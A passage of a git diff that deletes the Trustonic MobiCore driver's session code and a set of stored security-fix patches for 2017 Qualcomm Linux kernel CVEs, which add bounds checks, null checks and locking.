--	if (!IS_ERR_OR_NULL(wsm->mmu))
--		tbase_mmu_delete(wsm->mmu);
--
--	/* Unref cbuf if applicable */
--	if (wsm->cbuf)
--		tbase_cbuf_put(wsm->cbuf);
--
--	/* Delete wsm object */
--	MCDRV_DBG("freed wsm %p: mmu %p cbuf %p va %lx len %u",
--		  wsm, wsm->mmu, wsm->cbuf, wsm->va, wsm->len);
--	kfree(wsm);
--}
--
--static struct tbase_wsm *wsm_create(struct tbase_session *session,
--				    uintptr_t buf, uint32_t len)
--{
--	struct tbase_wsm *wsm;
--	struct task_struct *task = NULL;
--	uintptr_t va;
--	int ret;
--
--	/* Allocate structure */
--	wsm = kzalloc(sizeof(*wsm), GFP_KERNEL);
--	if (!wsm) {
--		ret = -ENOMEM;
--		goto err_no_wsm;
--	}
--
--	/* Add wsm to list so destroy can find it */
--	list_add(&wsm->list, &session->wsms);
--
--	/* Check if buffer is contained in a cbuf */
--	wsm->cbuf = tbase_cbuf_get_by_addr(session->client, buf);
--	if (wsm->cbuf) {
--		uintptr_t offset;
--
--		if (client_is_kernel(session->client))
--			offset = buf - tbase_cbuf_addr(wsm->cbuf);
--		else
--			offset = buf - tbase_cbuf_uaddr(wsm->cbuf);
--
--		if ((offset + len) > tbase_cbuf_len(wsm->cbuf)) {
--			ret = -EINVAL;
--			MCDRV_ERROR("crosses cbuf boundary");
--			goto err;
--		}
--		/* Provide kernel virtual address */
--		va = tbase_cbuf_addr(wsm->cbuf) + offset;
--	} else {
--		/* Not a cbuf. va is uva or kva depending on client. */
--		/* Provide "task" if client is user */
--		va = buf;
--		if (!client_is_kernel(session->client))
--			task = current;
--	}
--
--	/* Build MMU table for buffer */
--	wsm->mmu = tbase_mmu_create(task, (void *)va, len);
--	if (IS_ERR(wsm->mmu)) {
--		ret = PTR_ERR(wsm->mmu);
--		goto err;
--	}
--
--	wsm->va = buf;
--	wsm->len = len;
--	MCDRV_DBG("created wsm %p: mmu %p cbuf %p va %lx len %u",
--		  wsm, wsm->mmu, wsm->cbuf, wsm->va, wsm->len);
--	goto end;
--
--err:
--	wsm_free(wsm);
--err_no_wsm:
--	wsm = ERR_PTR(ret);
--end:
--	return wsm;
--}
--
--static inline int wsm_check(struct tbase_session *session,
--			    struct mc_ioctl_buffer *buf)
--{
--	struct tbase_wsm *wsm;
--
--	list_for_each_entry(wsm, &session->wsms, list) {
--		if ((buf->va < (wsm->va + wsm->len)) &&
--		    ((buf->va + buf->len) > wsm->va)) {
--			MCDRV_ERROR("buffer %lx overlaps with existing wsm",
--				    wsm->va);
--			return -EADDRINUSE;
--		}
--	}
--
--	return 0;
--}
--
--static inline struct tbase_wsm *wsm_find(struct tbase_session *session,
--					 uintptr_t va)
--{
--	struct tbase_wsm *wsm;
--
--	list_for_each_entry(wsm, &session->wsms, list)
--		if (wsm->va == va)
--			return wsm;
--
--	return NULL;
--}
--
--static inline int wsm_info(struct tbase_wsm *wsm, struct kasnprintf_buf *buf)
--{
--	ssize_t ret;
--
--	ret = kasnprintf(buf, "\t\twsm %p: mmu %p cbuf %p va %lx len %u\n",
--			 wsm, wsm->mmu, wsm->cbuf, wsm->va, wsm->len);
--	if (ret < 0)
--		return ret;
--
--	if (wsm->mmu) {
--		ret = tbase_mmu_info(wsm->mmu, buf);
--		if (ret < 0)
--			return ret;
--	}
--
--	return 0;
--}
--
--/*
-- * Share buffers with SWd and add corresponding WSM objects to session.
-- */
--int session_wsms_add(struct tbase_session *session,
--		     struct mc_ioctl_buffer *bufs)
--{
--	struct mc_ioctl_buffer *buf;
--	struct mcp_buffer_map maps[MC_MAP_MAX];
--	struct mcp_buffer_map *map;
--	int i, ret = 0;
--	uint32_t n_null_buf = 0;
--
--	/* Check parameters */
--	if (!session)
--		return -ENXIO;
--
--	/* Lock the session */
--	mutex_lock(&session->wsms_lock);
--
--	for (i = 0, buf = bufs, map = maps; i < MC_MAP_MAX; i++, buf++, map++) {
--		if (!buf->va) {
--			n_null_buf++;
--			continue;
--		}
--
--		/* Avoid mapping overlaps */
--		if (wsm_check(session, buf)) {
--			ret = -EADDRINUSE;
--			MCDRV_ERROR("maps[%d] va=%llx already map'd", i,
--				    buf->va);
--			goto unlock;
--		}
--	}
--
--	if (n_null_buf >= MC_MAP_MAX) {
--		ret = -EINVAL;
--		MCDRV_ERROR("va=NULL");
--		goto unlock;
--	}
--
--	for (i = 0, buf = bufs, map = maps; i < MC_MAP_MAX; i++, buf++, map++) {
--		struct tbase_wsm *wsm;
--
--		if (!buf->va) {
--			map->type = WSM_INVALID;
--			continue;
--		}
--
--		wsm = wsm_create(session, buf->va, buf->len);
--		if (IS_ERR(wsm)) {
--			ret = PTR_ERR(wsm);
--			MCDRV_ERROR("maps[%d] va=%llx create failed: %d", i,
--				    buf->va, ret);
--			goto end;
--		}
--
--		tbase_mmu_buffer(wsm->mmu, map);
--		MCDRV_DBG("maps[%d] va=%llx: t:%u a:%llx o:%u l:%u", i, buf->va,
--			  map->type, map->phys_addr, map->offset, map->length);
--	}
--
--	/* Map buffers */
--	if (g_ctx.f_multimap) {
--		/* Send MCP message to map buffers in SWd */
--		ret = mcp_multimap(session->mcp_session.id, maps);
--		if (ret)
--			MCDRV_ERROR("multimap failed: %d", ret);
--	} else {
--		/* Map each buffer */
--		for (i = 0, buf = bufs, map = maps; i < MC_MAP_MAX; i++, buf++,
--		     map++) {
--			if (!buf->va)
--				continue;
--
--			/* Send MCP message to map buffer in SWd */
--			ret = mcp_map(session->mcp_session.id, map);
--			if (ret) {
--				MCDRV_ERROR("maps[%d] va=%llx map failed: %d",
--					    i, buf->va, ret);
--				break;
--			}
--		}
--	}
--
--end:
--	for (i = 0, buf = bufs, map = maps; i < MC_MAP_MAX; i++, buf++, map++) {
--		struct tbase_wsm *wsm = wsm_find(session, buf->va);
--
--		if (!buf->va)
--			continue;
--
--		if (ret) {
--			if (!wsm)
--				break;
--
--			/* Destroy mapping */
--			wsm_free(wsm);
--		} else {
--			/* Store mapping */
--			buf->sva = map->secure_va;
--			wsm->sva = buf->sva;
--			MCDRV_DBG("maps[%d] va=%llx map'd len=%u sva=%llx",
--				  i, buf->va, buf->len, buf->sva);
--		}
--	}
--
--unlock:
--	/* Unlock the session */
--	mutex_unlock(&session->wsms_lock);
--	return ret;
--}
--
--/*
-- * Stop sharing buffers and delete corrsponding WSM objects.
-- */
--int session_wsms_remove(struct tbase_session *session,
--			const struct mc_ioctl_buffer *bufs)
--{
--	const struct mc_ioctl_buffer *buf;
--	struct mcp_buffer_map maps[MC_MAP_MAX];
--	struct mcp_buffer_map *map;
--	int i, ret = 0;
--	uint32_t n_null_buf = 0;
--
--	if (!session) {
--		MCDRV_ERROR("session pointer is null");
--		return -EINVAL;
--	}
--
--	/* Lock the session */
--	mutex_lock(&session->wsms_lock);
--
--	/* Find, check and map buffer */
--	for (i = 0, buf = bufs, map = maps; i < MC_MAP_MAX; i++, buf++, map++) {
--		struct tbase_wsm *wsm;
--
--		if (!buf->va) {
--			n_null_buf++;
--			map->secure_va = 0;
--			continue;
--		}
--
--		wsm = wsm_find(session, buf->va);
--		if (!wsm) {
--			ret = -EADDRNOTAVAIL;
--			MCDRV_ERROR("maps[%d] va=%llx not found", i,
--				    buf->va);
--			goto out;
--		}
--
--		/* Check input params consistency */
--		/* TODO: fix the spec, "len" is NOT ignored anymore */
--		if ((wsm->sva != buf->sva) || (wsm->len != buf->len)) {
--			MCDRV_ERROR("maps[%d] va=%llx no match: %x != %llx",
--				    i, buf->va, wsm->sva, buf->sva);
--			MCDRV_ERROR("maps[%d] va=%llx no match: %u != %u",
--				    i, buf->va, wsm->len, buf->len);
--			ret = -EINVAL;
--			goto out;
--		}
--
--		tbase_mmu_buffer(wsm->mmu, map);
--		map->secure_va = buf->sva;
--		MCDRV_DBG("maps[%d] va=%llx: t:%u a:%llx o:%u l:%u s:%llx", i,
--			  buf->va, map->type, map->phys_addr, map->offset,
--			  map->length, map->secure_va);
--	}
--
--	if (n_null_buf >= MC_MAP_MAX) {
--		ret = -EINVAL;
--		MCDRV_ERROR("va=NULL");
--		goto out;
--	}
--
--	if (g_ctx.f_multimap) {
--		/* Send MCP command to unmap buffers in SWd */
--		ret = mcp_multiunmap(session->mcp_session.id, maps);
--		if (ret)
--			MCDRV_ERROR("mcp_multiunmap failed: %d", ret);
--	} else {
--		for (i = 0, buf = bufs, map = maps; i < MC_MAP_MAX;
--		     i++, buf++, map++) {
--			if (!buf->va)
--				continue;
--
--			/* Send MCP command to unmap buffer in SWd */
--			ret = mcp_unmap(session->mcp_session.id, map);
--			if (ret) {
--				MCDRV_ERROR("maps[%d] va=%llx unmap failed: %d",
--					    i, buf->va, ret);
--				break;
--			}
--		}
--	}
--
--	for (i = 0, buf = bufs; i < MC_MAP_MAX; i++, buf++) {
--		struct tbase_wsm *wsm = wsm_find(session, buf->va);
--
--		if (!wsm)
--			break;
--
--		/* Free wsm */
--		wsm_free(wsm);
--		MCDRV_DBG("maps[%d] va=%llx unmap'd len=%u sva=%llx", i,
--			  buf->va, buf->len, buf->sva);
--	}
--
--out:
--	mutex_unlock(&session->wsms_lock);
--	return ret;
--}
--
--/*
-- * Sleep until next notification from SWd.
-- */
--int session_waitnotif(struct tbase_session *session, int32_t timeout)
--{
--	return mcp_session_waitnotif(&session->mcp_session, timeout);
--}
--
--int session_info(struct tbase_session *session, struct kasnprintf_buf *buf)
--{
--	struct tbase_wsm *wsm;
--	int32_t exit_code = mcp_session_exitcode(&session->mcp_session);
--	int ret;
--
--	ret = kasnprintf(buf, "\tsession %p: %x rc %d\n", session,
--			 session->mcp_session.id, exit_code);
--	if (ret < 0)
--		return ret;
--
--	/* WMSs */
--	mutex_lock(&session->wsms_lock);
--	if (list_empty(&session->wsms))
--		goto done;
--
--	list_for_each_entry(wsm, &session->wsms, list) {
--		ret = wsm_info(wsm, buf);
--		if (ret < 0)
--			goto done;
--	}
--
--done:
--	mutex_unlock(&session->wsms_lock);
--	if (ret < 0)
--		return ret;
--
--	return 0;
--}
-diff --git a/drivers/gud/MobiCoreDriver/session.h b/drivers/gud/MobiCoreDriver/session.h
-deleted file mode 100644
-index aec0c09ae9c9a..0000000000000
---- a/drivers/gud/MobiCoreDriver/session.h
-+++ /dev/null
-@@ -1,63 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--
--#ifndef _SESSION_H_
--#define _SESSION_H_
--
--#include <linux/list.h>
--
--#include "mcp.h"
--
--struct tbase_object;
--struct tbase_mmu;
--struct mc_ioctl_buffer;
--
--struct tbase_session {
--	/* Session list lock */
--	struct mutex		close_lock;
--	/* MCP session descriptor (MUST BE FIRST) */
--	struct mcp_session	mcp_session;
--	/* Owner */
--	struct tbase_client	*client;
--	/* Number of references kept to this object */
--	struct kref		kref;
--	/* The list entry to attach to session list of owner */
--	struct list_head	list;
--	/* Session WSMs lock */
--	struct mutex		wsms_lock;
--	/* List of WSMs for a session */
--	struct list_head	wsms;
--};
--
--struct tbase_session *session_create(struct tbase_client *client, bool is_gp,
--				     struct mc_identity *identity);
--int session_open(struct tbase_session *session, const struct tbase_object *obj,
--		 const struct tbase_mmu *obj_mmu, uintptr_t tci, size_t len);
--int session_close(struct tbase_session *session);
--static inline void session_get(struct tbase_session *session)
--{
--	kref_get(&session->kref);
--}
--
--int session_put(struct tbase_session *session);
--int session_wsms_add(struct tbase_session *session,
--		     struct mc_ioctl_buffer *bufs);
--int session_wsms_remove(struct tbase_session *session,
--			const struct mc_ioctl_buffer *bufs);
--int32_t session_exitcode(struct tbase_session *session);
--int session_notify_swd(struct tbase_session *session);
--int session_waitnotif(struct tbase_session *session, int32_t timeout);
--int session_info(struct tbase_session *session, struct kasnprintf_buf *buf);
--
--#endif /* _SESSION_H_ */
-diff --git a/drivers/gud/setupDrivers.sh b/drivers/gud/setupDrivers.sh
-deleted file mode 100644
-index 994e83e8d9517..0000000000000
---- a/drivers/gud/setupDrivers.sh
-+++ /dev/null
-@@ -1,19 +0,0 @@
--#!/bin/bash
--export COMP_PATH_ROOT=$(dirname $(readlink -f $BASH_SOURCE)) #set this to the absolute path of the folder containing this file
--
--# This part has to be set by the customer
--# To be set, absolute path of kernel folder
--export LINUX_PATH=
--# To be set, absolute path! CROSS_COMPILE variable needed by kernel eg /home/user/arm-2009q3/bin/arm-none-linux-gnueabi-
--export CROSS_COMPILE=
--# To be set, build mode debug or release
--export MODE=debug
--# To be set, the absolute path to the Linux Android NDK
--export NDK_PATH=
--
--# Global variables needed by build scripts
--export COMP_PATH_Logwrapper=$COMP_PATH_ROOT/Logwrapper/Out
--export COMP_PATH_MobiCore=$COMP_PATH_ROOT/MobiCore/Out
--export COMP_PATH_MobiCoreDriverMod=$COMP_PATH_ROOT/mobicore_driver/Out
--export COMP_PATH_MobiCoreDriverLib=$COMP_PATH_ROOT/daemon/Out
--export COMP_PATH_AndroidNdkLinux=$NDK_PATH
diff --git a/Patches/Linux_CVEs/CVE-2017-9692/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-9692/ANY/0001.patch
deleted file mode 100644
index c00c3baa..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9692/ANY/0001.patch
+++ /dev/null
@@ -1,31 +0,0 @@
-From 7a86f369594a0b6567820b77d441e778e6adb8a7 Mon Sep 17 00:00:00 2001
-From: Rajkumar Subbiah <rsubbia@codeaurora.org>
-Date: Mon, 15 May 2017 15:17:14 -0400
-Subject: [PATCH] msm: mdss: Fix potential dereferencing of null pointer
-
-During atomic commit on a writeback panel, there is a possibility
-of deferencing a NULL pointer if the configuration changes before
-the commit. This change adds a NULL pointer check to avoid it.
-
-Bug: 36731152
-Change-Id: I56d0efad40992b6f87c81e5eab93cf0f24f6f524
-Signed-off-by: Rajkumar Subbiah <rsubbia@codeaurora.org>
----
- drivers/video/msm/mdss/mdss_fb.c | 4 ++++
- 1 file changed, 4 insertions(+)
-
-diff --git a/drivers/video/msm/mdss/mdss_fb.c b/drivers/video/msm/mdss/mdss_fb.c
-index 86f380e8a845b..8e02cbf782e0f 100644
---- a/drivers/video/msm/mdss/mdss_fb.c
-+++ b/drivers/video/msm/mdss/mdss_fb.c
-@@ -3302,6 +3302,10 @@ int mdss_fb_atomic_commit(struct fb_info *info,
- 				MSMFB_ATOMIC_COMMIT, true, false);
- 			if (mfd->panel.type == WRITEBACK_PANEL) {
- 				output_layer = commit_v1->output_layer;
-+				if (!output_layer) {
-+					pr_err("Output layer is null\n");
-+					goto end;
-+				}
- 				wb_change = !mdss_fb_is_wb_config_same(mfd,
- 						commit_v1->output_layer);
- 				if (wb_change) {
diff --git a/Patches/Linux_CVEs/CVE-2017-9693/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-9693/qcacld-2.0/0001.patch
deleted file mode 100644
index 8f77168b..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9693/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,43 +0,0 @@
-From 05a5abb21e4d97001f77d344444a3ec2f9c275f9 Mon Sep 17 00:00:00 2001
-From: SaidiReddy Yenuga <saidir@codeaurora.org>
-Date: Tue, 16 May 2017 19:02:16 +0530
-Subject: qcacld-2.0: Trim extn capability to max supported in change station
-
-extn capabilities can be controlled by user, which can
-be sent greater than the max supported value. This results
-in stack overflow in change station command.
-
-Add check to validate extn capability param given by user
-and if it exceeds max supported value, set it to max supported
-value.
-
-CRs-Fixed: 2044820
-Change-Id: I531799dd06c41069e85ad969de6182363dbf9f05
----
- CORE/HDD/src/wlan_hdd_cfg80211.c | 8 +++++++-
- 1 file changed, 7 insertions(+), 1 deletion(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index 19c2c61..e1f5f0a 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -16209,9 +16209,15 @@ static int __wlan_hdd_change_station(struct wiphy *wiphy,
-             StaParams.supported_oper_classes_len  =
-                                              params->supported_oper_classes_len;
- 
-+            if (params->ext_capab_len > sizeof(StaParams.extn_capability)) {
-+                VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO,
-+                          "received extn capabilities:%d, resetting it to max supported",
-+                          params->ext_capab_len);
-+                params->ext_capab_len = sizeof(StaParams.extn_capability);
-+            }
-             if (0 != params->ext_capab_len)
-                 vos_mem_copy(StaParams.extn_capability, params->ext_capab,
--                             sizeof(StaParams.extn_capability));
-+                             params->ext_capab_len);
- 
-             if (NULL != params->ht_capa) {
-                 StaParams.htcap_present = 1;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9694/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-9694/qcacld-2.0/0001.patch
deleted file mode 100644
index bdc5a5ca..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9694/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,33 +0,0 @@
-From 1e47d44de7bab5500d27f17ae5c4ebebc7d2b4ef Mon Sep 17 00:00:00 2001
-From: SaidiReddy Yenuga <saidir@codeaurora.org>
-Date: Tue, 16 May 2017 18:00:47 +0530
-Subject: qcacld-2.0: Add lost AP sample size entry to nla policy
-
-improper validation of
-QCA_WLAN_VENDOR_ATTR_EXTSCAN_BSSID_HOTLIST_PARAMS_LOST_AP_SAMPLE_SIZE
-results in assigning an unchecked user-controller value.
-This can lead to buffer overflow.
-
-validate QCA_WLAN_VENDOR_ATTR_EXTSCAN_BSSID_HOTLIST_PARAMS_LOST_AP_SAMPLE_SIZE.
-
-CRs-Fixed: 2045470
-Change-Id: I7c33b6d78054672e9effbe9100c29e5604c250c6
----
- CORE/HDD/src/wlan_hdd_cfg80211.c | 1 +
- 1 file changed, 1 insertion(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index b53ba75..69b13b5 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -837,6 +837,7 @@ wlan_hdd_extscan_config_policy[QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_
-     [QCA_WLAN_VENDOR_ATTR_EXTSCAN_SSID_THRESHOLD_PARAM_RSSI_LOW] = { .type = NLA_S32 },
-     [QCA_WLAN_VENDOR_ATTR_EXTSCAN_SSID_THRESHOLD_PARAM_RSSI_HIGH] = { .type = NLA_S32 },
-     [QCA_WLAN_VENDOR_ATTR_EXTSCAN_CONFIGURATION_FLAGS] = { .type = NLA_U32 },
-+    [QCA_WLAN_VENDOR_ATTR_EXTSCAN_BSSID_HOTLIST_PARAMS_LOST_AP_SAMPLE_SIZE] = { .type = NLA_U32 },
- };
- 
- static const struct nla_policy
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9696/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-9696/3.10/0001.patch
deleted file mode 100644
index a38c6108..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9696/3.10/0001.patch
+++ /dev/null
@@ -1,34 +0,0 @@
-From 8b44a684139301fa31548e8120b7e6299965572a Mon Sep 17 00:00:00 2001
-From: Alok Kediya <kediya@codeaurora.org>
-Date: Thu, 2 Mar 2017 15:51:35 +0530
-Subject: [PATCH] msm: camera: Bound check for num_of_stream.
-
-- num of stream comes from userspace and used without
-any bound check.It may result to overflow update_info.
-
-CRs-Fixed: 2006829
-
-Bug: 36232584
-Change-Id: I8226e8f7081b28108dbed738ea4579e2051a85f2
-Signed-off-by: Alok Kediya <kediya@codeaurora.org>
----
- drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-index 43a2c77dcc8da..490ab13e4e607 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-@@ -817,6 +817,12 @@ int msm_isp_update_stats_stream(struct vfe_device *vfe_dev, void *arg)
- 	struct msm_vfe_axi_stream_cfg_update_info *update_info = NULL;
- 	struct msm_isp_sw_framskip *sw_skip_info = NULL;
- 
-+	if (update_cmd->num_streams > MSM_ISP_STATS_MAX) {
-+		pr_err("%s: Invalid num_streams %d\n",
-+			__func__, update_cmd->num_streams);
-+		return -EINVAL;
-+	}
-+
- 	/*validate request*/
- 	for (i = 0; i < update_cmd->num_streams; i++) {
- 		update_info = &update_cmd->update_info[i];
diff --git a/Patches/Linux_CVEs/CVE-2017-9697/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-9697/3.18/0001.patch
deleted file mode 100644
index ec34d811..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9697/3.18/0001.patch
+++ /dev/null
@@ -1,55 +0,0 @@
-From 4b788ca419ec37e4cdb421fef9edc208a491ce30 Mon Sep 17 00:00:00 2001
-From: Mohit Aggarwal <maggarwa@codeaurora.org>
-Date: Thu, 25 May 2017 20:21:12 +0530
-Subject: [PATCH] diag: Synchronize command registration table access
-
-Currently, command registration table is being read
-in debugfs without any protection which may lead to
-access of stale entries. The patch takes care of the
-issue by adding proper protection.
-
-CRs-Fixed: 2032672
-Bug: 63868628
-Change-Id: I6ae058c16873f9ed52ae6516a1a70fd6d2d0da80
-Signed-off-by: Mohit Aggarwal <maggarwa@codeaurora.org>
----
- drivers/char/diag/diag_debugfs.c | 6 +++++-
- 1 file changed, 5 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/char/diag/diag_debugfs.c b/drivers/char/diag/diag_debugfs.c
-index f5e4eba1e96bc..b66c8cb8257c2 100644
---- a/drivers/char/diag/diag_debugfs.c
-+++ b/drivers/char/diag/diag_debugfs.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2011-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2011-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -268,8 +268,10 @@ static ssize_t diag_dbgfs_read_table(struct file *file, char __user *ubuf,
- 	struct list_head *temp;
- 	struct diag_cmd_reg_t *item = NULL;
- 
-+	mutex_lock(&driver->cmd_reg_mutex);
- 	if (diag_dbgfs_table_index == driver->cmd_reg_count) {
- 		diag_dbgfs_table_index = 0;
-+		mutex_unlock(&driver->cmd_reg_mutex);
- 		return 0;
- 	}
- 
-@@ -278,6 +280,7 @@ static ssize_t diag_dbgfs_read_table(struct file *file, char __user *ubuf,
- 	buf = kzalloc(sizeof(char) * buf_size, GFP_KERNEL);
- 	if (ZERO_OR_NULL_PTR(buf)) {
- 		pr_err("diag: %s, Error allocating memory\n", __func__);
-+		mutex_unlock(&driver->cmd_reg_mutex);
- 		return -ENOMEM;
- 	}
- 	buf_size = ksize(buf);
-@@ -322,6 +325,7 @@ static ssize_t diag_dbgfs_read_table(struct file *file, char __user *ubuf,
- 			break;
- 	}
- 	diag_dbgfs_table_index = i;
-+	mutex_unlock(&driver->cmd_reg_mutex);
- 
- 	*ppos = 0;
- 	ret = simple_read_from_buffer(ubuf, count, ppos, buf, bytes_in_buffer);
diff --git a/Patches/Linux_CVEs/CVE-2017-9697/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-9697/4.4/0002.patch
deleted file mode 100644
index 9e19707d..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9697/4.4/0002.patch
+++ /dev/null
@@ -1,51 +0,0 @@
-From 7e45e3a6c1f6dd46d71fb6824a7cf702d2e79225 Mon Sep 17 00:00:00 2001
-From: Mohit Aggarwal <maggarwa@codeaurora.org>
-Date: Thu, 25 May 2017 20:21:12 +0530
-Subject: diag: Synchronize command registration table access
-
-Currently, command registration table is being read
-in debugfs without any protection which may lead to
-access of stale entries. The patch takes care of the
-issue by adding proper protection.
-
-CRs-Fixed: 2032672
-Change-Id: I6ae058c16873f9ed52ae6516a1a70fd6d2d0da80
-Signed-off-by: Mohit Aggarwal <maggarwa@codeaurora.org>
----
- drivers/char/diag/diag_debugfs.c | 4 ++++
- 1 file changed, 4 insertions(+)
-
-diff --git a/drivers/char/diag/diag_debugfs.c b/drivers/char/diag/diag_debugfs.c
-index ca7dd88..86e626d 100644
---- a/drivers/char/diag/diag_debugfs.c
-+++ b/drivers/char/diag/diag_debugfs.c
-@@ -273,8 +273,10 @@ static ssize_t diag_dbgfs_read_table(struct file *file, char __user *ubuf,
- 	struct list_head *temp;
- 	struct diag_cmd_reg_t *item = NULL;
- 
-+	mutex_lock(&driver->cmd_reg_mutex);
- 	if (diag_dbgfs_table_index == driver->cmd_reg_count) {
- 		diag_dbgfs_table_index = 0;
-+		mutex_unlock(&driver->cmd_reg_mutex);
- 		return 0;
- 	}
- 
-@@ -283,6 +285,7 @@ static ssize_t diag_dbgfs_read_table(struct file *file, char __user *ubuf,
- 	buf = kzalloc(sizeof(char) * buf_size, GFP_KERNEL);
- 	if (ZERO_OR_NULL_PTR(buf)) {
- 		pr_err("diag: %s, Error allocating memory\n", __func__);
-+		mutex_unlock(&driver->cmd_reg_mutex);
- 		return -ENOMEM;
- 	}
- 	buf_size = ksize(buf);
-@@ -327,6 +330,7 @@ static ssize_t diag_dbgfs_read_table(struct file *file, char __user *ubuf,
- 			break;
- 	}
- 	diag_dbgfs_table_index = i;
-+	mutex_unlock(&driver->cmd_reg_mutex);
- 
- 	*ppos = 0;
- 	ret = simple_read_from_buffer(ubuf, count, ppos, buf, bytes_in_buffer);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9702/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-9702/3.10/0001.patch
deleted file mode 100644
index 2ab44552..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9702/3.10/0001.patch
+++ /dev/null
@@ -1,43 +0,0 @@
-From 2ae1eab54e874553c078e5275421398597401ac9 Mon Sep 17 00:00:00 2001
-From: Haibin Liu <haibinl@codeaurora.org>
-Date: Wed, 17 May 2017 18:52:30 +0800
-Subject: [PATCH] msm: camera: fix untrusted pointer for power down setting
-
-When getting power down setting, there is an untrusted pointer
-from a user space pointer.Need to copy to the kernel space first.
-
-CRs-Fixed: 2037398
-Bug: 36492827
-Change-Id: I64032a96e62ddfeec85eebe984d8ba52754f6148
-Signed-off-by: Haibin Liu <haibinl@codeaurora.org>
----
- .../platform/msm/camera_v2/sensor/msm_sensor_driver.c    | 16 +++++-----------
- 1 file changed, 5 insertions(+), 11 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/msm_sensor_driver.c b/drivers/media/platform/msm/camera_v2/sensor/msm_sensor_driver.c
-index 87e741b651c4a..5d3c56191e0d4 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/msm_sensor_driver.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/msm_sensor_driver.c
-@@ -407,17 +407,11 @@ static int32_t msm_sensor_create_pd_settings(void *setting,
- 
- #ifdef CONFIG_COMPAT
- 	if (is_compat_task()) {
--		int i = 0;
--		struct msm_sensor_power_setting32 *power_setting_iter =
--		(struct msm_sensor_power_setting32 *)compat_ptr((
--		(struct msm_camera_sensor_slave_info32 *)setting)->
--		power_setting_array.power_setting);
--
--		for (i = 0; i < size_down; i++) {
--			pd[i].config_val = power_setting_iter[i].config_val;
--			pd[i].delay = power_setting_iter[i].delay;
--			pd[i].seq_type = power_setting_iter[i].seq_type;
--			pd[i].seq_val = power_setting_iter[i].seq_val;
-+		rc = msm_sensor_get_pw_settings_compat(
-+			pd, pu, size_down);
-+		if (rc < 0) {
-+			pr_err("failed");
-+			return -EFAULT;
- 		}
- 	} else
- #endif
diff --git a/Patches/Linux_CVEs/CVE-2017-9702/3.10/0002.patch b/Patches/Linux_CVEs/CVE-2017-9702/3.10/0002.patch
deleted file mode 100644
index eba2fa50..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9702/3.10/0002.patch
+++ /dev/null
@@ -1,122 +0,0 @@
-From c46b2ecd901a12867d0dd91ae019f4b7256bcfec Mon Sep 17 00:00:00 2001
-From: Haibin Liu <haibinl@codeaurora.org>
-Date: Wed, 9 Aug 2017 16:26:41 +0800
-Subject: [PATCH] msm: sensor: Fix crash when ioctl VIDIOC_MSM_SENSOR_INIT_CFG
-
-Issue:
-the invalid slave_info is used by msm_sensor_driver_probe.
-This cause crash when ioctl VIDIOC_MSM_SENSOR_INIT_CFG repeatedly.
-
-Fix:
-1) avoid the same msm_sd_subdev added into the ordered_sd_list.
-2) enlarge the buffer size for i2c addr and data.
-
-Bug: 36492827
-Change-Id: Idffcd3b82b9590dbfdcaf14b80668cc894178f54
-Signed-off-by: Haibin Liu <haibinl@codeaurora.org>
----
- drivers/media/platform/msm/camera_v2/msm.c         |  5 +++++
- .../msm/camera_v2/sensor/io/msm_camera_cci_i2c.c   |  5 +++--
- .../msm/camera_v2/sensor/msm_sensor_driver.c       | 25 ++++++++++++++--------
- 3 files changed, 24 insertions(+), 11 deletions(-)
-
